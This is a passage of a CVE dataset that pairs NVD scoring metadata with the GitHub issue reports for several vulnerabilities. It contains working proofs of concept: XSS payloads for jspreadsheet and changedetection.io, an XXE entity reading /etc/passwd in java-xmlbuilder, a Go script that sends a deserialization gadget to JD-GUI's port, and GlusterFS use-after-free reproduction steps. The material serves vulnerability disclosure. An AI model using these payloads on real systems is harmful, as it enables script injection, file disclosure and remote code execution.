"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product"
],
"url": "https://github.com/jspreadsheet/ce"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jspreadsheet/ce/issues/1587"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jspreadsheet:jspreadsheet:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0AA70187-1C33-40DA-89A0-4796EEAF06CB",
"versionEndExcluding": "4.6.0",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/jspreadsheet/ce/issues/1587 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"jspreadsheet",
"ce"
] | ## reproduce
```
<html>
<script src="https://bossanova.uk/jspreadsheet/v4/jexcel.js"></script>
<script src="https://jsuites.net/v4/jsuites.js"></script>
<link rel="stylesheet" href="https://jsuites.net/v4/jsuites.css" type="text/css" />
<link rel="stylesheet" href="https://bossanova.uk/jspreadsheet/v4/jexcel.css" type="text/css" />
<div id="spreadsheet"></div>
<script>
var data = [
['Jazz', 'Honda', '2019-02-12', '', true, '$ 2.000,00', '#777700'],
['Civic', 'Honda', '2018-07-11', '', true, '$ 4.000,01', '#007777'],
];
jspreadsheet(document.getElementById('spreadsheet'), {
data:data,
columns: [
{
type: 'text',
title:'Car',
width:90
},
{
type: 'dropdown',
title:'Make',
width:120,
source:[
"Alfa Romeo<img src onerror='alert(1)'>",
"Audi",
"Bmw",
"Chevrolet",
"Chrystler",
// (...)
]
},
{
type: 'calendar',
title:'Available',
width:120
},
{
type: 'image',
title:'Photo',
width:120
},
{
type: 'checkbox',
title:'Stock',
width:80
},
{
type: 'numeric',
title:'Price',
mask:'$ #.##,00',
width:80,
decimal:','
},
{
type: 'color',
width:80,
render:'square',
},
]
});
</script>
</html>
```
Save the above code to a file named test.html. And open it in browser.
Then double click the cross of row 1 and colume Make , js code will be executed

## impact
xss . https://owasp.org/www-community/attacks/xss/
| potential cross site scripting at jspreadsheet drowdown | https://api.github.com/repos/jspreadsheet/ce/issues/1587/comments | 2 | 2022-12-23T07:46:23Z | 2023-02-12T13:17:42Z | https://github.com/jspreadsheet/ce/issues/1587 | 1,509,015,595 | 1,587 | 4,747 |
CVE-2023-24769 | 2023-02-17T22:15:14.407 | Changedetection.io before v0.40.1.1 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the main page. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the URL parameter under the "Add a new change detection watch" function. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/dgtlmoon/changedetection.io/issues/1358"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://www.edoardoottavianelli.it/CVE-2023-24769"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "https://www.youtube.com/watch?v=TRTpRlkU3Hc"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/dgtlmoon/changedetection.io/issues/1358"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://www.edoardoottavianelli.it/CVE-2023-24769"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "https://www.youtube.com/watch?v=TRTpRlkU3Hc"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:changedetection:changedetection:*:*:*:*:*:*:*:*",
"matchCriteriaId": "66459535-A392-4D66-B613-7E43EB801F2F",
"versionEndExcluding": "0.40.1.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/dgtlmoon/changedetection.io/issues/1358 | [
"Exploit",
"Vendor Advisory"
] | github.com | [
"dgtlmoon",
"changedetection.io"
] | **Describe the bug**
It's possible to inject arbitrary Javascript code in the main page of changedetection.io. This can result in a stored cross site scripting attack. Since in `/settings#api` it's exposed the plaintext API Key, the attacker can read also the api key with an XSS attack.
**Version**
I'm using *v0.39.20.4*, but I'm sure other version could be affected as well.
**To Reproduce**
Steps to reproduce the behavior:
1. Go to the main page.
2. Under *Add a new change detection watch* add as URL `javascript:alert(document.domain)`
3. Click *Watch*
4. A new row is added under the websites watched
5. Click CTRL+ click with mouse on the link taking to a new tab
6. Javascript payload is being executed.
Reproduce the vulnerability with https://changedetection.io/share/LpbICKx5Rbca
**Expected behavior**
`javascript` protocol should be blocked like `file://` for security reasons.
**Screenshots**

**Desktop (please complete the following information):**
- OS: `Linux edoardottt 5.19.0-29-generic`
- Browser: Chrome Version 109.0.5414.119 (Official Build) (64-bit)
- Changedetetion.io Version: v0.39.20.4 | [Security] Stored XSS in main page | https://api.github.com/repos/dgtlmoon/changedetection.io/issues/1358/comments | 10 | 2023-01-28T22:11:50Z | 2023-01-29T10:11:11Z | https://github.com/dgtlmoon/changedetection.io/issues/1358 | 1,561,030,802 | 1,358 | 4,748 |
CVE-2014-125087 | 2023-02-19T17:15:11.103 | A vulnerability was found in java-xmlbuilder up to 1.1. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation leads to xml external entity reference. Upgrading to version 1.2 is able to address this issue. The name of the patch is e6fddca201790abab4f2c274341c0bb8835c3e73. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-221480. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.2,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 5.1,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.1,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Patch"
],
"url": "https://github.com/jmurty/java-xmlbuilder/commit/e6fddca201790abab4f2c274341c0bb8835c3e73"
},
{
"source": "cna@vuldb.com",
"tags": [
"Exploit"
],
"url": "https://github.com/jmurty/java-xmlbuilder/issues/6"
},
{
"source": "cna@vuldb.com",
"tags": [
"Release Notes"
],
"url": "https://github.com/jmurty/java-xmlbuilder/releases/tag/v1.2"
},
{
"source": "cna@vuldb.com",
"tags": null,
"url": "https://security.netapp.com/advisory/ntap-20240208-0009/"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.221480"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.221480"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/jmurty/java-xmlbuilder/commit/e6fddca201790abab4f2c274341c0bb8835c3e73"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "https://github.com/jmurty/java-xmlbuilder/issues/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Release Notes"
],
"url": "https://github.com/jmurty/java-xmlbuilder/releases/tag/v1.2"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://security.netapp.com/advisory/ntap-20240208-0009/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"Third Party Advisory"
],
"url": "https://vuldb.com/?ctiid.221480"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://vuldb.com/?id.221480"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:java-xmlbuilder_project:java-xmlbuilder:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A0A9C0B1-C9F8-435E-825A-F52828E5D148",
"versionEndExcluding": "1.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"611"
] | 611 | https://github.com/jmurty/java-xmlbuilder/issues/6 | [
"Exploit"
] | github.com | [
"jmurty",
"java-xmlbuilder"
] | I noticed that by default, the parser in XMLBuilder is vulnerable to XXE.
The following PoC is a modified version of the TestXMLBuilder2.java file that would see the local file included in parser output.
package com.jamesmurty.utils;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathExpressionException;
public class TestXMLBuilder2 extends BaseXMLBuilderTests {
```
public static final String EXAMPLE_XML_DOC2 = "<?xml version=\"1.0\"?><!DOCTYPE Projects [ <!ELEMENT JetS3t ANY> <!ENTITY xx1 SYSTEM \"file:///etc/passwd\"> ]>" + EXAMPLE_XML_DOC_START + "&xx1;" + EXAMPLE_XML_DOC_END;
@Override
public Class<? extends BaseXMLBuilder> XMLBuilderToTest() throws Exception {
return XMLBuilder2.class;
}
@Override
protected boolean isRuntimeExceptionsOnly() {
return true;
}
// NOTE: No checked exceptions for API calls made in this test method
public void testNoCheckedExceptions() {
XMLBuilder2 builder = XMLBuilder2.create("Blah");
builder = XMLBuilder2.parse(EXAMPLE_XML_DOC2);
builder.stripWhitespaceOnlyTextNodes();
builder.asString();
builder.elementAsString();
builder.xpathQuery("/*", XPathConstants.NODESET);
builder = builder.xpathFind("/Projects");
System.out.println(builder.getElement().getTextContent());
}
public void testExceptionWrappedInXMLBuilderRuntimeException() {
XMLBuilder2 builder = XMLBuilder2.parse(EXAMPLE_XML_DOC2);
try {
builder.xpathFind("/BadPath");
fail("Expected XMLBuilderRuntimeException");
} catch (XMLBuilderRuntimeException e) {
assertEquals(XMLBuilderRuntimeException.class, e.getClass());
Throwable cause = e.getCause();
assertEquals(XPathExpressionException.class, cause.getClass());
assertTrue(cause.getMessage().contains("does not resolve to an Element"));
}
}
```
}
| XMLBuilder2 is vulnerable to XML External Entity (XXE) injection | https://api.github.com/repos/jmurty/java-xmlbuilder/issues/6/comments | 1 | 2014-07-22T17:27:44Z | 2014-07-22T20:55:04Z | https://github.com/jmurty/java-xmlbuilder/issues/6 | 38,423,199 | 6 | 4,749 |
CVE-2023-26234 | 2023-02-21T00:15:11.393 | JD-GUI 1.6.6 allows deserialization via UIMainWindowPreferencesProvider.singleInstance. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.7,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/java-decompiler/jd-gui/issues/415"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/java-decompiler/jd-gui/pull/417"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/java-decompiler/jd-gui/issues/415"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/java-decompiler/jd-gui/pull/417"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jd-gui_project:jd-gui:1.6.6:*:*:*:*:*:*:*",
"matchCriteriaId": "C110DFC0-14E8-4651-A104-59C8F5957B8C",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"502"
] | 502 | https://github.com/java-decompiler/jd-gui/issues/415 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"java-decompiler",
"jd-gui"
] | ## RCE Vulnerability in JD-GUI
Description: When user open `UIMainWindowPreferencesProvider.singleInstance` config and use JDK 8u20/7u21, there will be an RCE vulnerability through deserialization on port 20156.
**CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H (Moderate 6.6)**
How to reproduce:
(1) Use single instance config in `jd-gui.cfg`
```xml
<preferences>
<JdGuiPreferences.errorBackgroundColor>0xFF6666</JdGuiPreferences.errorBackgroundColor>
<JdGuiPreferences.jdCoreVersion>1.1.3</JdGuiPreferences.jdCoreVersion>
<UIMainWindowPreferencesProvider.singleInstance>true</UIMainWindowPreferencesProvider.singleInstance>
</preferences>
```
(2) Start jd-gui using JDK 8u20
```shell
"C:\Program Files\Java\jdk1.8.0_20\bin\java.exe" -jar jd-gui-1.6.6.jar
```
(3) Make JDK 8u20 payload
https://github.com/pwntester/JRE8u20_RCE_Gadget
Modify the cmd in `ExploitGenerator#main`
```java
String command = "calc.exe";
```
Run `ExploitGenerator#main` to generate payload (`exploit.ser`)
(4) Send binary data to 20156 port
```go
package main
import (
"fmt"
"net"
"os"
)
func main() {
payload, _ := os.ReadFile("exploit.ser")
conn, err := net.Dial("tcp", "127.0.0.1:20156")
_, err = conn.Write(payload)
buf := make([]byte, 1024*10)
_, err = conn.Read(buf)
if err != nil {
fmt.Println(err)
}
}
```
(5) RCE
Screenshot:

(6) Fix
Use `resolveClass` method, only support String[]
```java
/*
* Copyright (c) 2008-2019 Emmanuel Dupuy.
* This project is distributed under the GPLv3 license.
* This is a Copyleft license that gives the user the right to use,
* copy and modify the code freely for non-commercial purposes.
*/
package org.jd.gui.util.net;
import org.jd.gui.util.exception.ExceptionUtil;
import java.io.*;
import java.net.InetAddress;
import java.net.ServerSocket;
import java.net.Socket;
import java.util.function.Consumer;
public class InterProcessCommunicationUtil {
static class FilterObjectInputStream extends ObjectInputStream {
public FilterObjectInputStream(InputStream in) throws IOException {
super(in);
}
@Override
protected Class<?> resolveClass(final ObjectStreamClass classDesc) throws IOException, ClassNotFoundException {
if (classDesc.getName().equals("[Ljava.lang.String;")) {
return super.resolveClass(classDesc);
}
throw new RuntimeException(String.format("not support class: %s",classDesc.getName()));
}
}
protected static final int PORT = 2015_6;
public static void listen(final Consumer<String[]> consumer) throws Exception {
final ServerSocket listener = new ServerSocket(PORT);
Runnable runnable = new Runnable() {
@Override
public void run() {
while (true) {
try (Socket socket = listener.accept();
ObjectInputStream ois = new FilterObjectInputStream(socket.getInputStream())) {
// Receive args from another JD-GUI instance
String[] args = (String[])ois.readObject();
consumer.accept(args);
} catch (IOException|ClassNotFoundException e) {
assert ExceptionUtil.printStackTrace(e);
}
}
}
};
new Thread(runnable).start();
}
public static void send(String[] args) {
try (Socket socket = new Socket(InetAddress.getLocalHost(), PORT);
ObjectOutputStream oos = new ObjectOutputStream(socket.getOutputStream())) {
// Send args to the main JD-GUI instance
oos.writeObject(args);
} catch (IOException e) {
assert ExceptionUtil.printStackTrace(e);
}
}
}
```
Screenshot:

| [Security] RCE Vulnerability in JD-GUI | https://api.github.com/repos/java-decompiler/jd-gui/issues/415/comments | 1 | 2023-02-03T15:36:06Z | 2023-09-14T02:09:55Z | https://github.com/java-decompiler/jd-gui/issues/415 | 1,570,035,057 | 415 | 4,750 |
CVE-2022-48340 | 2023-02-21T02:15:10.217 | In Gluster GlusterFS 11.0, there is an xlators/cluster/dht/src/dht-common.c dht_setxattr_mds_cbk use-after-free. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gluster/glusterfs/issues/3732"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE6K2DXP4QZVKP32Z7BSYDSRBL4H7JSE/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gluster/glusterfs/issues/3732"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UE6K2DXP4QZVKP32Z7BSYDSRBL4H7JSE/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gluster:glusterfs:11.0:-:*:*:*:*:*:*",
"matchCriteriaId": "9522DB77-4E95-41C2-BD9E-A98F3AD0BF31",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"416"
] | 416 | https://github.com/gluster/glusterfs/issues/3732 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"gluster",
"glusterfs"
] | <!-- Please use this template while reporting an issue, providing as much information as possible. Failure to do so may result in a delayed response. Thank you! -->
**Description of problem:**
There is a heap-user-after-free bug in the latest git version 37f6ced36792e42b98160f9cfffdbf307421e155 .
**The exact command to reproduce the issue**:
Suppose we have two GlusterFS servers and one client whose IPs are `192.168.0.30`, `192.168.0.31`, `192.168.0.33`.
1. Start the two servers by executing the following script at the server `192.168.0.30`.
```bash
#Start daemons
systemctl restart glusterd
sshpass -p "123456" ssh -o StrictHostKeyChecking=no root@192.168.0.31 systemctl restart glusterd
#Create a volume
gluster peer probe 192.168.0.31
gluster volume create test_volume 192.168.0.30:/root/glusterfs-server 192.168.0.31:/root/glusterfs-server force
gluster volume start test_volume force
```bash
2. Mount the client, create a directory `testdir` and set an attribute for it.
```bash
mount -t glusterfs 192.168.0.30:/test_volume /root/glusterfs-client/
mkdir /root/glusterfs-client/testdir
setfattr -n user.attr -v val /root/glusterfs-client/testdir
getfattr -d /root/glusterfs-client/testdir
```
3. Kill the GlusterFS daemons `/usr/local/sbin/glusterfsd` and `/usr/local/sbin/glusterd` at the second server `192.168.0.31`.
4. Remove the attribute of `testdir`
```bash
setfattr -x user.attr /root/glusterfs-client/testdir
```
5. The GlusterFS client will crash with the user-after-free bug.
**The full output of the command that failed**:
```bash
=================================================================
==326==ERROR: AddressSanitizer: heap-use-after-free on address 0x62100006d434 at pc 0x7fffeee3b776 bp 0x7ffff00c8610
sp 0x7ffff00c8600
READ of size 4 at 0x62100006d434 thread T6
#0 0x7fffeee3b775 in dht_setxattr_mds_cbk /root/glusterfs/xlators/cluster/dht/src/dht-common.c:3944
#1 0x7fffef034527 in client4_0_removexattr_cbk /root/glusterfs/xlators/protocol/client/src/client-rpc-fops_v2.c:
1061
#2 0x7ffff721ffca in rpc_clnt_handle_reply /root/glusterfs/rpc/rpc-lib/src/rpc-clnt.c:723
#3 0x7ffff721ffca in rpc_clnt_notify /root/glusterfs/rpc/rpc-lib/src/rpc-clnt.c:890
#4 0x7ffff7219983 in rpc_transport_notify /root/glusterfs/rpc/rpc-lib/src/rpc-transport.c:521
#5 0x7ffff018a5a6 in socket_event_poll_in_async /root/glusterfs/rpc/rpc-transport/socket/src/socket.c:2358
#6 0x7ffff019ab39 in gf_async ../../../../libglusterfs/src/glusterfs/async.h:187
#7 0x7ffff019ab39 in socket_event_poll_in /root/glusterfs/rpc/rpc-transport/socket/src/socket.c:2399
#8 0x7ffff019ab39 in socket_event_handler /root/glusterfs/rpc/rpc-transport/socket/src/socket.c:2790
#9 0x7ffff019ab39 in socket_event_handler /root/glusterfs/rpc/rpc-transport/socket/src/socket.c:2710
#10 0x7ffff73fa6c0 in event_dispatch_epoll_handler /root/glusterfs/libglusterfs/src/event-epoll.c:631
#11 0x7ffff73fa6c0 in event_dispatch_epoll_worker /root/glusterfs/libglusterfs/src/event-epoll.c:742
#12 0x7ffff71bf608 in start_thread /build/glibc-YYA7BZ/glibc-2.31/nptl/pthread_create.c:477
#13 0x7ffff70e4102 in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x122102)
0x62100006d434 is located 1844 bytes inside of 4164-byte region [0x62100006cd00,0x62100006dd44)
freed by thread T6 here:
#0 0x7ffff769a7cf in __interceptor_free (/lib/x86_64-linux-gnu/libasan.so.5+0x10d7cf)
#1 0x7ffff7355e19 in __gf_free /root/glusterfs/libglusterfs/src/mem-pool.c:383
#2 0x7fffeedbbacd in dht_local_wipe /root/glusterfs/xlators/cluster/dht/src/dht-helper.c:805
#3 0x7fffeedbbacd in dht_local_wipe /root/glusterfs/xlators/cluster/dht/src/dht-helper.c:713
#4 0x7fffeeea7312 in dht_setxattr_non_mds_cbk /root/glusterfs/xlators/cluster/dht/src/dht-common.c:3898
#5 0x7fffef034527 in client4_0_removexattr_cbk /root/glusterfs/xlators/protocol/client/src/client-rpc-fops_v2.c:
1061
#6 0x7fffeefe35ac in client_submit_request /root/glusterfs/xlators/protocol/client/src/client.c:288
#7 0x7fffef01b198 in client4_0_removexattr /root/glusterfs/xlators/protocol/client/src/client-rpc-fops_v2.c:4481
#8 0x7fffeefce5da in client_removexattr /root/glusterfs/xlators/protocol/client/src/client.c:1439
#9 0x7fffeee38f1d in dht_setxattr_mds_cbk /root/glusterfs/xlators/cluster/dht/src/dht-common.c:3977
#10 0x7fffef034527 in client4_0_removexattr_cbk /root/glusterfs/xlators/protocol/client/src/client-rpc-fops_v2.c
:1061
#11 0x7ffff721ffca in rpc_clnt_handle_reply /root/glusterfs/rpc/rpc-lib/src/rpc-clnt.c:723
#12 0x7ffff721ffca in rpc_clnt_notify /root/glusterfs/rpc/rpc-lib/src/rpc-clnt.c:890
#13 0x7ffff7219983 in rpc_transport_notify /root/glusterfs/rpc/rpc-lib/src/rpc-transport.c:521
#14 0x7ffff018a5a6 in socket_event_poll_in_async /root/glusterfs/rpc/rpc-transport/socket/src/socket.c:2358
#15 0x7ffff019ab39 in gf_async ../../../../libglusterfs/src/glusterfs/async.h:187
#16 0x7ffff019ab39 in socket_event_poll_in /root/glusterfs/rpc/rpc-transport/socket/src/socket.c:2399
#17 0x7ffff019ab39 in socket_event_handler /root/glusterfs/rpc/rpc-transport/socket/src/socket.c:2790
#18 0x7ffff019ab39 in socket_event_handler /root/glusterfs/rpc/rpc-transport/socket/src/socket.c:2710
#19 0x7ffff73fa6c0 in event_dispatch_epoll_handler /root/glusterfs/libglusterfs/src/event-epoll.c:631
#20 0x7ffff73fa6c0 in event_dispatch_epoll_worker /root/glusterfs/libglusterfs/src/event-epoll.c:742
#21 0x7ffff71bf608 in start_thread /build/glibc-YYA7BZ/glibc-2.31/nptl/pthread_create.c:477
previously allocated by thread T8 here:
#0 0x7ffff769adc6 in calloc (/lib/x86_64-linux-gnu/libasan.so.5+0x10ddc6)
#1 0x7ffff7355226 in __gf_calloc /root/glusterfs/libglusterfs/src/mem-pool.c:177
#2 0x7fffeedc7b19 in dht_local_init /root/glusterfs/xlators/cluster/dht/src/dht-helper.c:815
#3 0x7fffeeebba59 in dht_removexattr /root/glusterfs/xlators/cluster/dht/src/dht-common.c:6142
#4 0x7fffeed70781 in gf_utime_removexattr /root/glusterfs/xlators/features/utime/src/utime-autogen-fops.c:428
#5 0x7ffff7481291 in default_removexattr /root/glusterfs/libglusterfs/src/defaults.c:2816
#6 0x7ffff7481291 in default_removexattr /root/glusterfs/libglusterfs/src/defaults.c:2816
#7 0x7ffff7481291 in default_removexattr /root/glusterfs/libglusterfs/src/defaults.c:2816
#8 0x7fffeecb3437 in mdc_removexattr /root/glusterfs/xlators/performance/md-cache/src/md-cache.c:2738
#9 0x7ffff74df738 in default_removexattr_resume /root/glusterfs/libglusterfs/src/defaults.c:2046
#10 0x7ffff731da15 in call_resume_wind /root/glusterfs/libglusterfs/src/call-stub.c:2087
#11 0x7ffff734d8f4 in call_resume /root/glusterfs/libglusterfs/src/call-stub.c:2390
#12 0x7fffeec608bc in iot_worker /root/glusterfs/xlators/performance/io-threads/src/io-threads.c:227
#13 0x7ffff71bf608 in start_thread /build/glibc-YYA7BZ/glibc-2.31/nptl/pthread_create.c:477
Thread T6 created by T0 here:
#0 0x7ffff75c7805 in pthread_create (/lib/x86_64-linux-gnu/libasan.so.5+0x3a805)
#1 0x7ffff72f8b97 in gf_thread_vcreate /root/glusterfs/libglusterfs/src/common-utils.c:3261
#2 0x7ffff730a28d in gf_thread_create /root/glusterfs/libglusterfs/src/common-utils.c:3284
#3 0x7ffff73f8af2 in event_dispatch_epoll /root/glusterfs/libglusterfs/src/event-epoll.c:797
#4 0x7ffff7353f89 in gf_event_dispatch /root/glusterfs/libglusterfs/src/event.c:115
#5 0x7ffff7461b7f in gf_io_main /root/glusterfs/libglusterfs/src/gf-io.c:431
#6 0x7ffff7461b7f in gf_io_run /root/glusterfs/libglusterfs/src/gf-io.c:516
#7 0x55555556c37a in main /root/glusterfs/glusterfsd/src/glusterfsd.c:2774
#8 0x7ffff6fe90b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
Thread T8 created by T7 here:
#0 0x7ffff75c7805 in pthread_create (/lib/x86_64-linux-gnu/libasan.so.5+0x3a805)
#1 0x7ffff72f8b97 in gf_thread_vcreate /root/glusterfs/libglusterfs/src/common-utils.c:3261
#2 0x7ffff730a28d in gf_thread_create /root/glusterfs/libglusterfs/src/common-utils.c:3284
#3 0x7fffeec5face in __iot_workers_scale /root/glusterfs/xlators/performance/io-threads/src/io-threads.c:830
#4 0x7fffeec67d62 in iot_workers_scale /root/glusterfs/xlators/performance/io-threads/src/io-threads.c:853
#5 0x7fffeec67d62 in init /root/glusterfs/xlators/performance/io-threads/src/io-threads.c:1251
#6 0x7ffff72e5208 in __xlator_init /root/glusterfs/libglusterfs/src/xlator.c:610
#7 0x7ffff72e5208 in xlator_init /root/glusterfs/libglusterfs/src/xlator.c:635
#8 0x7ffff7378672 in glusterfs_graph_init /root/glusterfs/libglusterfs/src/graph.c:474
#9 0x7ffff737971b in glusterfs_graph_activate /root/glusterfs/libglusterfs/src/graph.c:823
#10 0x555555573a4e in glusterfs_process_volfp /root/glusterfs/glusterfsd/src/glusterfsd.c:2493
